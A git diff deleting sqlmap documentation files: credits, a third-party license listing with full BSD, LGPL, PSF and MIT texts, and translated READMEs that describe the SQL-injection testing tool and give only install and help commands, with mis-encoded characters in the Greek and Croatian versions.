http://goo.gl/spX3N - -SOURCE Conference team, -* for the opportunity to present my research titled 'Expanding the control over the operating system from the database' at SOURCE Conference 2009 on September 21, 2009 in Barcelona (ES). I unveiled and demonstrated some of the sqlmap 0.8 release candidate version new features during my presentation - * Homepage: http://goo.gl/IeXV4 - * Slides: http://goo.gl/OKnfj - -AthCon Conference team, -* for the opportunity to present my research titled 'Got database access? Own the network!' at AthCon Conference 2010 on June 3, 2010 in Athens (GR). I unveiled and demonstrated some of the sqlmap 0.8 version features during my presentation - * Homepage: http://goo.gl/Fs71I - * Slides: http://goo.gl/QMfjO - -Metasploit Framework development team, -* for their powerful tool Metasploit Framework, used by sqlmap, among others things, to create the shellcode and establish an out-of-band connection between sqlmap and the database server - * Homepage: http://www.metasploit.com - -OWASP Board, -* for sponsoring part of the sqlmap development in the context of OWASP Spring of Code 2007 - * Homepage: http://www.owasp.org diff --git a/doc/THIRD-PARTY.md b/doc/THIRD-PARTY.md deleted file mode 100644 index f2479b31..00000000 --- a/doc/THIRD-PARTY.md +++ /dev/null @@ -1,314 +0,0 @@ -This file lists bundled packages and their associated licensing terms. - -# BSD - -* The Ansistrm library located under thirdparty/ansistrm/. - Copyright (C) 2010-2012, Vinay Sajip. -* The Beautiful Soup library located under thirdparty/beautifulsoup/. - Copyright (C) 2004-2010, Leonard Richardson. -* The ClientForm library located under thirdparty/clientform/. - Copyright (C) 2002-2007, John J. Lee. - Copyright (C) 2005, Gary Poster. - Copyright (C) 2005, Zope Corporation. - Copyright (C) 1998-2000, Gisle Aas. -* The Colorama library located under thirdparty/colorama/. - Copyright (C) 2010, Jonathan Hartley. -* The Fcrypt library located under thirdparty/fcrypt/. - Copyright (C) 2000, 2001, 2004 Carey Evans. -* The Odict library located under thirdparty/odict/. - Copyright (C) 2005, Nicola Larosa, Michael Foord. -* The Oset library located under thirdparty/oset/. - Copyright (C) 2010, BlueDynamics Alliance, Austria. - Copyright (C) 2009, Raymond Hettinger, and others. -* The PrettyPrint library located under thirdparty/prettyprint/. - Copyright (C) 2010, Chris Hall. -* The SocksiPy library located under thirdparty/socks/. - Copyright (C) 2006, Dan-Haim. - -```` -Redistribution and use in source and binary forms, with or without -modification, are permitted provided that the following conditions are met: - - Redistributions of source code must retain the above copyright - notice, this list of conditions and the following disclaimer. - - Redistributions in binary form must reproduce the above copyright - notice, this list of conditions and the following disclaimer in the - documentation and/or other materials provided with the distribution. - - Neither the name of the nor the - names of its contributors may be used to endorse or promote products - derived from this software without specific prior written permission. - -THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND -ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED -WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE -DISCLAIMED. IN NO EVENT SHALL BE LIABLE FOR ANY -DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES -(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; -LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND -ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT -(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS -SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. -```` - -# LGPL - -* The Chardet library located under thirdparty/chardet/. - Copyright (C) 2008, Mark Pilgrim. -* The Gprof2dot library located under thirdparty/gprof2dot/. - Copyright (C) 2008-2009, Jose Fonseca. -* The KeepAlive library located under thirdparty/keepalive/. - Copyright (C) 2002-2003, Michael D. Stenner. -* The MultipartPost library located under thirdparty/multipart/. - Copyright (C) 2006, Will Holcomb. -* The XDot library located under thirdparty/xdot/. - Copyright (C) 2008, Jose Fonseca. -* The icmpsh tool located under extra/icmpsh/. - Copyright (C) 2010, Nico Leidecker, Bernardo Damele. - -```` - GNU LESSER GENERAL PUBLIC LICENSE - Version 3, 29 June 2007 - - Copyright (C) 2007 Free Software Foundation, Inc. - Everyone is permitted to copy and distribute verbatim copies - of this license document, but changing it is not allowed. - - - This version of the GNU Lesser General Public License incorporates -the terms and conditions of version 3 of the GNU General Public -License, supplemented by the additional permissions listed below. - - 0. Additional Definitions. - - As used herein, "this License" refers to version 3 of the GNU Lesser -General Public License, and the "GNU GPL" refers to version 3 of the GNU -General Public License. - - "The Library" refers to a covered work governed by this License, -other than an Application or a Combined Work as defined below. - - An "Application" is any work that makes use of an interface provided -by the Library, but which is not otherwise based on the Library. -Defining a subclass of a class defined by the Library is deemed a mode -of using an interface provided by the Library. - - A "Combined Work" is a work produced by combining or linking an -Application with the Library. The particular version of the Library -with which the Combined Work was made is also called the "Linked -Version". - - The "Minimal Corresponding Source" for a Combined Work means the -Corresponding Source for the Combined Work, excluding any source code -for portions of the Combined Work that, considered in isolation, are -based on the Application, and not on the Linked Version. - - The "Corresponding Application Code" for a Combined Work means the -object code and/or source code for the Application, including any data -and utility programs needed for reproducing the Combined Work from the -Application, but excluding the System Libraries of the Combined Work. - - 1. Exception to Section 3 of the GNU GPL. - - You may convey a covered work under sections 3 and 4 of this License -without being bound by section 3 of the GNU GPL. - - 2. Conveying Modified Versions. - - If you modify a copy of the Library, and, in your modifications, a -facility refers to a function or data to be supplied by an Application -that uses the facility (other than as an argument passed when the -facility is invoked), then you may convey a copy of the modified -version: - - a) under this License, provided that you make a good faith effort to - ensure that, in the event an Application does not supply the - function or data, the facility still operates, and performs - whatever part of its purpose remains meaningful, or - - b) under the GNU GPL, with none of the additional permissions of - this License applicable to that copy. - - 3. Object Code Incorporating Material from Library Header Files. - - The object code form of an Application may incorporate material from -a header file that is part of the Library. You may convey such object -code under terms of your choice, provided that, if the incorporated -material is not limited to numerical parameters, data structure -layouts and accessors, or small macros, inline functions and templates -(ten or fewer lines in length), you do both of the following: - - a) Give prominent notice with each copy of the object code that the - Library is used in it and that the Library and its use are - covered by this License. - - b) Accompany the object code with a copy of the GNU GPL and this license - document. - - 4. Combined Works. - - You may convey a Combined Work under terms of your choice that, -taken together, effectively do not restrict modification of the -portions of the Library contained in the Combined Work and reverse -engineering for debugging such modifications, if you also do each of -the following: - - a) Give prominent notice with each copy of the Combined Work that - the Library is used in it and that the Library and its use are - covered by this License. - - b) Accompany the Combined Work with a copy of the GNU GPL and this license - document. - - c) For a Combined Work that displays copyright notices during - execution, include the copyright notice for the Library among - these notices, as well as a reference directing the user to the - copies of the GNU GPL and this license document. - - d) Do one of the following: - - 0) Convey the Minimal Corresponding Source under the terms of this - License, and the Corresponding Application Code in a form - suitable for, and under terms that permit, the user to - recombine or relink the Application with a modified version of - the Linked Version to produce a modified Combined Work, in the - manner specified by section 6 of the GNU GPL for conveying - Corresponding Source. - - 1) Use a suitable shared library mechanism for linking with the - Library. A suitable mechanism is one that (a) uses at run time - a copy of the Library already present on the user's computer - system, and (b) will operate properly with a modified version - of the Library that is interface-compatible with the Linked - Version. - - e) Provide Installation Information, but only if you would otherwise - be required to provide such information under section 6 of the - GNU GPL, and only to the extent that such information is - necessary to install and execute a modified version of the - Combined Work produced by recombining or relinking the - Application with a modified version of the Linked Version. (If - you use option 4d0, the Installation Information must accompany - the Minimal Corresponding Source and Corresponding Application - Code. If you use option 4d1, you must provide the Installation - Information in the manner specified by section 6 of the GNU GPL - for conveying Corresponding Source.) - - 5. Combined Libraries. - - You may place library facilities that are a work based on the -Library side by side in a single library together with other library -facilities that are not Applications and are not covered by this -License, and convey such a combined library under terms of your -choice, if you do both of the following: - - a) Accompany the combined library with a copy of the same work based - on the Library, uncombined with any other library facilities, - conveyed under the terms of this License. - - b) Give prominent notice with the combined library that part of it - is a work based on the Library, and explaining where to find the - accompanying uncombined form of the same work. - - 6. Revised Versions of the GNU Lesser General Public License. - - The Free Software Foundation may publish revised and/or new versions -of the GNU Lesser General Public License from time to time. Such new -versions will be similar in spirit to the present version, but may -differ in detail to address new problems or concerns. - - Each version is given a distinguishing version number. If the -Library as you received it specifies that a certain numbered version -of the GNU Lesser General Public License "or any later version" -applies to it, you have the option of following the terms and -conditions either of that published version or of any later version -published by the Free Software Foundation. If the Library as you -received it does not specify a version number of the GNU Lesser -General Public License, you may choose any version of the GNU Lesser -General Public License ever published by the Free Software Foundation. - - If the Library as you received it specifies that a proxy can decide -whether future versions of the GNU Lesser General Public License shall -apply, that proxy's public statement of acceptance of any version is -permanent authorization for you to choose that version for the -Library. -```` - -# PSF - -* The Magic library located under thirdparty/magic/. - Copyright (C) 2011, Adam Hupp. - -```` -PSF LICENSE AGREEMENT FOR PYTHON 2.7.3 - -This LICENSE AGREEMENT is between the Python Software Foundation (“PSFâ€), -and the Individual or Organization (“Licenseeâ€) accessing and otherwise -using Python 2.7.3 software in source or binary form and its associated -documentation. -Subject to the terms and conditions of this License Agreement, PSF hereby -grants Licensee a nonexclusive, royalty-free, world-wide license to -reproduce, analyze, test, perform and/or display publicly, prepare -derivative works, distribute, and otherwise use Python 2.7.3 alone or in any -derivative version, provided, however, that PSF’s License Agreement and -PSF’s notice of copyright, i.e., “Copyright © 2001-2012 Python Software -Foundation; All Rights Reserved†are retained in Python 2.7.3 alone or in -any derivative version prepared by Licensee. -In the event Licensee prepares a derivative work that is based on or -incorporates Python 2.7.3 or any part thereof, and wants to make the -derivative work available to others as provided herein, then Licensee hereby -agrees to include in any such work a brief summary of the changes made to -Python 2.7.3. -PSF is making Python 2.7.3 available to Licensee on an “AS IS†basis. PSF -MAKES NO REPRESENTATIONS OR WARRANTIES, EXPRESS OR IMPLIED. BY WAY OF -EXAMPLE, BUT NOT LIMITATION, PSF MAKES NO AND DISCLAIMS ANY REPRESENTATION -OR WARRANTY OF MERCHANTABILITY OR FITNESS FOR ANY PARTICULAR PURPOSE OR THAT -THE USE OF PYTHON 2.7.3 WILL NOT INFRINGE ANY THIRD PARTY RIGHTS. -PSF SHALL NOT BE LIABLE TO LICENSEE OR ANY OTHER USERS OF PYTHON 2.7.3 FOR -ANY INCIDENTAL, SPECIAL, OR CONSEQUENTIAL DAMAGES OR LOSS AS A RESULT OF -MODIFYING, DISTRIBUTING, OR OTHERWISE USING PYTHON 2.7.3, OR ANY DERIVATIVE -THEREOF, EVEN IF ADVISED OF THE POSSIBILITY THEREOF. -This License Agreement will automatically terminate upon a material breach -of its terms and conditions. -Nothing in this License Agreement shall be deemed to create any relationship -of agency, partnership, or joint venture between PSF and Licensee. This -License Agreement does not grant permission to use PSF trademarks or trade -name in a trademark sense to endorse or promote products or services of -Licensee, or any third party. -By copying, installing or otherwise using Python 2.7.3, Licensee agrees to -be bound by the terms and conditions of this License Agreement. -```` - -# MIT - -* The bottle web framework library located under thirdparty/bottle/. - Copyright (C) 2012, Marcel Hellkamp. -* The PageRank library located under thirdparty/pagerank/. - Copyright (C) 2010, Corey Goldberg. -* The Termcolor library located under thirdparty/termcolor/. - Copyright (C) 2008-2011, Volvox Development Team. - -```` -Permission is hereby granted, free of charge, to any person obtaining -a copy of this software and associated documentation files (the -"Software"), to deal in the Software without restriction, including -without limitation the rights to use, copy, modify, merge, publish, -distribute, sublicense, and/or sell copies of the Software, and to -permit persons to whom the Software is furnished to do so, subject to -the following conditions: - -The above copyright notice and this permission notice shall be -included in all copies or substantial portions of the Software. - -THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, -EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF -MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND -NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE -LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION -OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION -WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. - -```` - -# Public domain - -* The PyDes library located under thirdparty/pydes/. - Copyleft 2009, Todd Whiteman. diff --git a/doc/translations/README-es-MX.md b/doc/translations/README-es-MX.md deleted file mode 100644 index 32ca795a..00000000 --- a/doc/translations/README-es-MX.md +++ /dev/null @@ -1,52 +0,0 @@ -# sqlmap - -[![Build Status](https://api.travis-ci.org/sqlmapproject/sqlmap.svg?branch=master)](https://api.travis-ci.org/sqlmapproject/sqlmap) [![Python 2.6|2.7](https://img.shields.io/badge/python-2.6|2.7-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/doc/COPYING) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap) - -sqlmap es una herramienta para pruebas de penetración "penetration testing" de software libre que automatiza el proceso de detección y explotación de fallos mediante inyección de SQL además de tomar el control de servidores de bases de datos. Contiene un poderoso motor de detección, así como muchas de las funcionalidades escenciales para el "pentester" y una amplia gama de opciones desde la recopilación de información para identificar el objetivo conocido como "fingerprinting" mediante la extracción de información de la base de datos, hasta el acceso al sistema de archivos subyacente para ejecutar comandos en el sistema operativo a través de conexiones alternativas conocidas como "Out-of-band". - -Capturas de Pantalla ---- -![Screenshot](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png) - -Visita la [colección de capturas de pantalla](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) que demuestra algunas de las características en la documentación(wiki). - -Instalación ---- - -Se puede descargar el "tarball" más actual haciendo clic [aquí](https://github.com/sqlmapproject/sqlmap/tarball/master) o el "zipball" [aquí](https://github.com/sqlmapproject/sqlmap/zipball/master). - -Preferentemente, se puede descargar sqlmap clonando el repositorio [Git](https://github.com/sqlmapproject/sqlmap): - - git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev - -sqlmap funciona con las siguientes versiones de [Python](http://www.python.org/download/) ** 2.6.x** y ** 2.7.x** en cualquier plataforma. - -Uso ---- - -Para obtener una lista de opciones básicas: - - python sqlmap.py -h - -Para obtener una lista de todas las opciones: - - python sqlmap.py -hh - -Se puede encontrar una muestra de su funcionamiento [aquí](https://gist.github.com/stamparm/5335217). -Para obtener una visión general de las capacidades de sqlmap, así como un listado funciones soportadas y descripción de todas las opciones y modificadores, junto con ejemplos, se recomienda consultar el [manual de usuario](https://github.com/sqlmapproject/sqlmap/wiki). - -Enlaces ---- - -* Página principal: http://sqlmap.org -* Descargar: [. tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) o [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master) -* Fuente de Cambios "Commit RSS feed": https://github.com/sqlmapproject/sqlmap/commits/master.atom -* Seguimiento de problemas "Issue tracker": https://github.com/sqlmapproject/sqlmap/issues -* Manual de usuario: https://github.com/sqlmapproject/sqlmap/wiki -* Preguntas frecuentes (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ -* Subscripción a la lista de correo: https://lists.sourceforge.net/lists/listinfo/sqlmap-users -* Fuente de la lista de correo "RSS feed": http://rss.gmane.org/messages/complete/gmane.comp.security.sqlmap -* Archivos de lista de correo: http://news.gmane.org/gmane.comp.security.sqlmap -* Twitter: [@sqlmap](https://twitter.com/sqlmap) -* Demostraciones: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos) -* Imágenes: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots diff --git a/doc/translations/README-gr-GR.md b/doc/translations/README-gr-GR.md deleted file mode 100644 index bb7b5a46..00000000 --- a/doc/translations/README-gr-GR.md +++ /dev/null @@ -1,53 +0,0 @@ -# sqlmap - -[![Build Status](https://api.travis-ci.org/sqlmapproject/sqlmap.svg?branch=master)](https://api.travis-ci.org/sqlmapproject/sqlmap) [![Python 2.6|2.7](https://img.shields.io/badge/python-2.6|2.7-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/doc/COPYING) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap) - -Το sqlmap είναι Ï€ÏόγÏαμμα Î±Î½Î¿Î¹Ï‡Ï„Î¿Ï ÎºÏŽÎ´Î¹ÎºÎ±, που αυτοματοποιεί την εÏÏεση και εκμετάλλευση ευπαθειών Ï„Ïπου SQL Injection σε βάσεις δεδομένων. ΈÏχεται με μια δυνατή μηχανή αναγνώÏισης ευπαθειών, πολλά εξειδικευμένα χαÏακτηÏιστικά για τον απόλυτο penetration tester όπως και με ένα μεγάλο εÏÏος επιλογών αÏχίζοντας από την αναγνώÏιση της βάσης δεδομένων, κατέβασμα δεδομένων της βάσης, μέχÏι και Ï€Ïόσβαση στο βαθÏτεÏο σÏστημα αÏχείων και εκτέλεση εντολών στο απευθείας στο λειτουÏγικό μέσω εκτός ζώνης συνδέσεων. - -Εικόνες ----- - -![Screenshot](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png) - -ΜποÏείτε να επισκεφτείτε τη [συλλογή από εικόνες](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) που επιδεικνÏουν κάποια από τα χαÏακτηÏιστικά. - -Εγκατάσταση ----- - -Έχετε τη δυνατότητα να κατεβάσετε την τελευταία tarball πατώντας [εδώ](https://github.com/sqlmapproject/sqlmap/tarball/master) ή την τελευταία zipball πατώντας [εδώ](https://github.com/sqlmapproject/sqlmap/zipball/master). - -Κατά Ï€Ïοτίμηση, μποÏείτε να κατεβάσετε το sqlmap κάνοντας κλώνο το [Git](https://github.com/sqlmapproject/sqlmap) αποθετήÏιο: - - git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev - -Το sqlmap λειτουÏγεί χωÏίς πεÏαιτέÏω κόπο με την [Python](http://www.python.org/download/) έκδοσης **2.6.x** και **2.7.x** σε όποια πλατφόÏμα. - -ΧÏήση ----- - -Για να δείτε μια βασική λίστα από επιλογές πατήστε: - - python sqlmap.py -h - -Για να πάÏετε μια λίστα από όλες τις επιλογές πατήστε: - - python sqlmap.py -hh - -ΜποÏείτε να δείτε ένα δείγμα λειτουÏγίας του Ï€ÏογÏάμματος [εδώ](https://gist.github.com/stamparm/5335217). -Για μια γενικότεÏη άποψη των δυνατοτήτων του sqlmap, μια λίστα των υποστηÏιζόμενων χαÏακτηÏιστικών και πεÏιγÏαφή για όλες τις επιλογές, μαζί με παÏαδείγματα, καλείστε να συμβουλευτείτε το [εγχειÏίδιο χÏήστη](https://github.com/sqlmapproject/sqlmap/wiki). - -ΣÏνδεσμοι ----- - -* ΑÏχική σελίδα: http://sqlmap.org -* Λήψεις: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) ή [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master) -* Commits RSS feed: https://github.com/sqlmapproject/sqlmap/commits/master.atom -* ΠÏοβλήματα: https://github.com/sqlmapproject/sqlmap/issues -* ΕγχειÏίδιο ΧÏήστη: https://github.com/sqlmapproject/sqlmap/wiki -* Συχνές ΕÏωτήσεις (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ -* ΕγγÏαφή σε Mailing list: https://lists.sourceforge.net/lists/listinfo/sqlmap-users -* Mailing list RSS feed: http://rss.gmane.org/messages/complete/gmane.comp.security.sqlmap -* Mailing list αÏχείο: http://news.gmane.org/gmane.comp.security.sqlmap -* Twitter: [@sqlmap](https://twitter.com/sqlmap) -* Demos: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos) -* Εικόνες: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots diff --git a/doc/translations/README-hr-HR.md b/doc/translations/README-hr-HR.md deleted file mode 100644 index f603389b..00000000 --- a/doc/translations/README-hr-HR.md +++ /dev/null @@ -1,53 +0,0 @@ -# sqlmap - -[![Build Status](https://api.travis-ci.org/sqlmapproject/sqlmap.svg?branch=master)](https://api.travis-ci.org/sqlmapproject/sqlmap) [![Python 2.6|2.7](https://img.shields.io/badge/python-2.6|2.7-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/doc/COPYING) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap) - -sqlmap je alat namijenjen za penetracijsko testiranje koji automatizira proces detekcije i eksploatacije sigurnosnih propusta SQL injekcije te preuzimanje poslužitelja baze podataka. Dolazi s moćnim mehanizmom za detekciju, mnoÅ¡tvom korisnih opcija za napredno penetracijsko testiranje te Å¡iroki spektar opcija od onih za prepoznavanja baze podataka, preko dohvaćanja podataka iz baze, do pristupa zahvaćenom datoteÄnom sustavu i izvrÅ¡avanja komandi na operacijskom sustavu koriÅ¡tenjem tzv. "out-of-band" veza. - -Slike zaslona ----- - -![Slika zaslona](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png) - -Možete posjetiti [kolekciju slika zaslona](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) gdje se demonstriraju neke od znaÄajki na wiki stranicama. - -Instalacija ----- - -Možete preuzeti zadnji tarball klikom [ovdje](https://github.com/sqlmapproject/sqlmap/tarball/master) ili zadnji zipball klikom [ovdje](https://github.com/sqlmapproject/sqlmap/zipball/master). - -Po mogućnosti, možete preuzeti sqlmap kloniranjem [Git](https://github.com/sqlmapproject/sqlmap) repozitorija: - - git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev - -sqlmap radi bez posebnih zahtjeva koriÅ¡tenjem [Python](http://www.python.org/download/) verzije **2.6.x** i/ili **2.7.x** na bilo kojoj platformi. - -KoriÅ¡tenje ----- - -Kako biste dobili listu osnovnih opcija i prekidaÄa koristite: - - python sqlmap.py -h - -Kako biste dobili listu svih opcija i prekidaÄa koristite: - - python sqlmap.py -hh - -Možete pronaći primjer izvrÅ¡avanja [ovdje](https://gist.github.com/stamparm/5335217). -Kako biste dobili pregled mogućnosti sqlmap-a, liste podržanih znaÄajki te opis svih opcija i prekidaÄa, zajedno s primjerima, preporuÄen je uvid u [korisniÄki priruÄnik](https://github.com/sqlmapproject/sqlmap/wiki). - -Poveznice ----- - -* PoÄetna stranica: http://sqlmap.org -* Preuzimanje: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) ili [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master) -* RSS feed promjena u kodu: https://github.com/sqlmapproject/sqlmap/commits/master.atom -* Prijava problema: https://github.com/sqlmapproject/sqlmap/issues -* KorisniÄki priruÄnik: https://github.com/sqlmapproject/sqlmap/wiki -* NajÄešće postavljena pitanja (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ -* Pretplata na mailing listu: https://lists.sourceforge.net/lists/listinfo/sqlmap-users -* RSS feed mailing liste: http://rss.gmane.org/messages/complete/gmane.comp.security.sqlmap -* Arhiva mailing liste: http://news.gmane.org/gmane.comp.security.sqlmap -* Twitter: [@sqlmap](https://twitter.com/sqlmap) -* Demo: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos) -* Slike zaslona: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots diff --git a/doc/translations/README-id-ID.md b/doc/translations/README-id-ID.md deleted file mode 100644 index 80113759..00000000 --- a/doc/translations/README-id-ID.md +++ /dev/null @@ -1,54 +0,0 @@ -# sqlmap - -[![Build Status](https://api.travis-ci.org/sqlmapproject/sqlmap.svg?branch=master)](https://api.travis-ci.org/sqlmapproject/sqlmap) [![Python 2.6|2.7](https://img.shields.io/badge/python-2.6|2.7-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/doc/COPYING) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap) - -sqlmap merupakan alat _(tool)_ bantu _open source_ dalam melakukan tes penetrasi yang mengotomasi proses deteksi dan eksploitasi kelemahan _SQL injection_ dan pengambil-alihan server basisdata. sqlmap dilengkapi dengan pendeteksi canggih, fitur-fitur hanal bagi _penetration tester_, beragam cara untuk mendeteksi basisdata, hingga mengakses _file system_ dan mengeksekusi perintah dalam sistem operasi melalui koneksi _out-of-band_. - -Tangkapan Layar ----- - -![Tangkapan Layar](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png) - -Anda dapat mengunjungi [koleksi tangkapan layar](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) yang mendemonstrasikan beberapa fitur dalam wiki. - -Instalasi ----- - -Anda dapat mengunduh tarball versi terbaru [di sini] -(https://github.com/sqlmapproject/sqlmap/tarball/master) atau zipball [di sini](https://github.com/sqlmapproject/sqlmap/zipball/master). - -Sebagai alternatif, Anda dapat mengunduh sqlmap dengan men-_clone_ repositori [Git](https://github.com/sqlmapproject/sqlmap): - - git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev - -sqlmap berfungsi langsung pada [Python](http://www.python.org/download/) versi **2.6.x** dan **2.7.x** pada platform apapun. - -Penggunaan ----- - -Untuk mendapatkan daftar opsi dasar gunakan: - - python sqlmap.py -h - -Untuk mendapatkan daftar opsi lanjut gunakan: - - python sqlmap.py -hh - -Anda dapat mendapatkan contoh penggunaan [di sini](https://gist.github.com/stamparm/5335217). -Untuk mendapatkan gambaran singkat kemampuan sqlmap, daftar fitur yang didukung, deskripsi dari semua opsi, berikut dengan contohnya, Anda disarankan untuk membaca [manual pengguna](https://github.com/sqlmapproject/sqlmap/wiki). - -Tautan ----- - -* Situs: http://sqlmap.org -* Unduh: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) atau [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master) -* RSS feed dari commits: https://github.com/sqlmapproject/sqlmap/commits/master.atom -* Issue tracker: https://github.com/sqlmapproject/sqlmap/issues -* Wiki Manual Penggunaan: https://github.com/sqlmapproject/sqlmap/wiki -* Pertanyaan yang Sering Ditanyakan (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ -* Berlangganan milis: https://lists.sourceforge.net/lists/listinfo/sqlmap-users -* RSS feed dari milis: http://rss.gmane.org/messages/complete/gmane.comp.security.sqlmap -* Arsip milis: http://news.gmane.org/gmane.comp.security.sqlmap -* Twitter: [@sqlmap](https://twitter.com/sqlmap) -* Video Demo [#1](http://www.youtube.com/user/inquisb/videos) dan [#2](http://www.youtube.com/user/stamparm/videos) -* Tangkapan Layar: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots diff --git a/doc/translations/README-pt-BR.md b/doc/translations/README-pt-BR.md deleted file mode 100644 index 6c86c308..00000000 --- a/doc/translations/README-pt-BR.md +++ /dev/null @@ -1,54 +0,0 @@ -# sqlmap - -[![Build Status](https://api.travis-ci.org/sqlmapproject/sqlmap.svg?branch=master)](https://api.travis-ci.org/sqlmapproject/sqlmap) [![Python 2.6|2.7](https://img.shields.io/badge/python-2.6|2.7-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/doc/COPYING) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap) - -sqlmap é uma ferramenta de teste de penetração de código aberto que automatiza o processo de detecção e exploração de falhas de injeção SQL. Com essa ferramenta é possível assumir total controle de servidores de banco de dados em páginas web vulneráveis, inclusive de base de dados fora do sistema invadido. Ele possui um motor de detecção poderoso, empregando as últimas e mais devastadoras técnicas de teste de penetração por SQL Injection, que permite acessar a base de dados, o sistema de arquivos subjacente e executar comandos no sistema operacional. - -Imagens ----- - -![Imagem](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png) - -Você pode visitar a [coleção de imagens](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) que demonstra alguns dos recursos apresentados na wiki. - -Instalação ----- - -Você pode baixar o arquivo tar mais recente clicando [aqui] -(https://github.com/sqlmapproject/sqlmap/tarball/master) ou o arquivo zip mais recente clicando [aqui](https://github.com/sqlmapproject/sqlmap/zipball/master). - -De preferência, você pode baixar o sqlmap clonando o repositório [Git](https://github.com/sqlmapproject/sqlmap): - - git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev - -sqlmap funciona em [Python](http://www.python.org/download/) nas versões **2.6.x** e **2.7.x** em todas as plataformas. - -Como usar ----- - -Para obter uma lista das opções básicas faça: - - python sqlmap.py -h - -Para obter a lista completa de opções faça: - - python sqlmap.py -hh - -Você pode encontrar alguns exemplos [aqui](https://gist.github.com/stamparm/5335217). -Para ter uma visão geral dos recursos do sqlmap, lista de recursos suportados e a descrição de todas as opções, juntamente com exemplos, aconselhamos que você consulte o [manual do usuário](https://github.com/sqlmapproject/sqlmap/wiki). - -Links ----- - -* Homepage: http://sqlmap.org -* Download: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) ou [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master) -* Commits RSS feed: https://github.com/sqlmapproject/sqlmap/commits/master.atom -* Issue tracker: https://github.com/sqlmapproject/sqlmap/issues -* Manual do Usuário: https://github.com/sqlmapproject/sqlmap/wiki -* Perguntas frequentes (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ -* Mailing list subscription: https://lists.sourceforge.net/lists/listinfo/sqlmap-users -* Mailing list RSS feed: http://rss.gmane.org/messages/complete/gmane.comp.security.sqlmap -* Mailing list archive: http://news.gmane.org/gmane.comp.security.sqlmap -* Twitter: 